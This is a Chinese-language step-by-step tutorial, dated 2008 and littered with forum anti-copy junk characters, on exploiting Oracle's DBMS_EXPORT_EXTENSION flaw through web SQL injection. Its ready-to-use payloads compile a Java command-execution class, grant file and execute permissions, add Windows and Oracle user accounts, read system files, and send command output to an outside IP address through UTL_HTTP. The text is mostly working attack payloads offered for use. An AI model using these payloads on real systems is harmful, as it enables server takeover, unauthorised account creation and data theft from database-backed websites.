
实例演示oracle注入获取cmdshell的全过程

以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可。(用 " 'a'|| " 是为了让语句返回 true 值。)
语句有点长,可能要用 POST 提交。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在 oracle 上创建 Java 包 LinxUtil,里面有两个函数:runCMD 用于执行系统命令,readFile 用于读取文件:
/xxx.jsp?id=1 and '1'<>'a'||( $ T# j7 I: w0 O! d  D2 I
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''3 U0 E" X4 K0 Z- [% O; G
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
$ g" v6 s4 Z0 j" H8 [+ N$ j( hnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
, _% I& w6 T, Q& \' C& Z  o}'''';END;'';END;--','SYS',0,'1',0) from dual
* i0 h  T& G: T9 _)
" T, A6 T: a( h0 b. C------------------------ & o: E2 U  t2 _$ Y
如果 url 有长度限制,可以把 readFile() 函数块去掉,即:
/xxx.jsp?id=1 and '1'<>'a'||(
2 z! l) Q6 x0 |. H: ]; Gselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''8 s/ U9 ~0 p- Q5 f
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader($ }* {( s, X. T0 u
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
: B6 `& B* [- l1 @& B  u1 G5 M}'''';END;'';END;--','SYS',0,'1',0) from dual
3 P, w* i3 i( }: S+ y2 j)
同时把后面步骤提到的对 readFile() 的处理语句去掉。
------------------------------
2.赋Java权限
7 e9 T1 o3 U3 ]# _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual- A8 N8 @$ h5 E5 S
3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
1 g* ~- s+ a$ \/ V0 v: K  Jcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
/ G; ~6 g. A# Qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
  R2 h$ I+ P- T, q6 G1 Ccreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4.赋public执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
. T$ r) M( p$ ~4 kselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5.测试上面的几步是否成功
3 d  n7 Z9 Q% ^  r# a" pand '1'<>'11'||( 6 G' a- f0 H/ j9 a& P
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
# t* z$ L" L# x; B. Z)
  ~$ s2 D& b$ y3 v3 ^and '1'<>( 9 Z# ~+ a. E* k" Y
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
9 M! f8 }( T8 ~)
6.执行命令:
$ |" r6 g: m2 y/xxx.jsp?id=1 and '1'<>(
/ }6 Z9 `/ z, Q! S" Z: T! ]select  sys.LinxRunCMD('cmd /c net user linx /add') from dual 5 ~' R" A6 L/ G; C) r" I/ Y: s
3 s( J6 j, V& e. G: R
) 5 S: P# C- F9 ~! l- e- P; b
/xxx.jsp?id=1 and '1'<>(
) z8 H: }$ ]% ]& I5 O. eselect  sys.LinxReadFile('c:/boot.ini') from dual
# a$ Z" E6 ^+ P/ k9 `' [; z, O8 Z- c5 J0 Q  {5 G
)
  I$ k# f4 e) g( U6 F8 U2 i  5 q6 I& K4 P5 \1 z# N
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union :
& @5 f; M0 v2 ]  Z1 e/ D/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual4 p1 x) Q5 }) v
或者用 UTL_HTTP.request():
& O7 K) W0 z1 P+ a' z; f8 _( a8 U/xxx.jsp?id=1 and '1'<>( 8 I" s" H1 x: b
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual0 Y8 y; d: b6 h* N# k
)
1 y% m; L0 E% Y$ b" k/xxx.jsp?id=1 and '1'<>(
" M/ W, n& i; p/ `" ?SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
+ L* |7 p' Z4 Q( g)
注意:用 UTL_HTTP.request 时,要用 REPLACE() 把空格、换行符替换掉,否则会无法提交 http request。用 utl_encode.base64_encode 也可以。
--------------------
6.内部变化
通过以下命令可以查看 all_objects 表的改变:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
7.删除我们创建的函数
$ d0 m2 D$ \) n4 r; Fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''0 L/ [5 j* s. ]& b
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual ; L; \" v: x5 I7 Q
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法:
创建oracle帐号:
4 h% N' N* V6 Y+ `( Uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
+ ]) F+ `# D. x, WCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual% H5 A) ]% Q- e9 S4 y+ _
即:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
" |- |# `" s) w9 K4 O6 L; o2 [% }chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual , d. j- v1 y2 z# o$ _
确定漏洞存在:
$ L0 n. F  G- v7 j6 C1<>(
1 j7 L8 w1 K; i0 g' _* u6 pselect user_id from all_users where username='LINXSQL' 1 |8 y4 J& V8 K- n; z: g
) " |8 _% l. c1 y
给linxsql连接权限:
2 O6 r: C! E7 [, jselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
% x% ^6 |+ u: {* O4 K( _7 a8 a$ }GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: i1 k/ o5 x1 c7 ~6 g+ h/ bdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
以下方法创建一个可以执行多语句的函数 Linx_query(),执行成功的话返回数值 "1"。但由于该函数以调用者权限(authid current_user)运行,权限是继承的,可能仅仅是 public 权限,作用似乎不大;真的要用的话可以考虑 grant dba to 当前的 User:
1.jsp?id=1 and '1'<>(
* e3 _! i( I/ v  H" Mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& N' a. s+ n. ~9 A. x% ?) Ycreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
' w( r! U  M+ s) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
' i' |: r1 @5 T: x) x4 @ )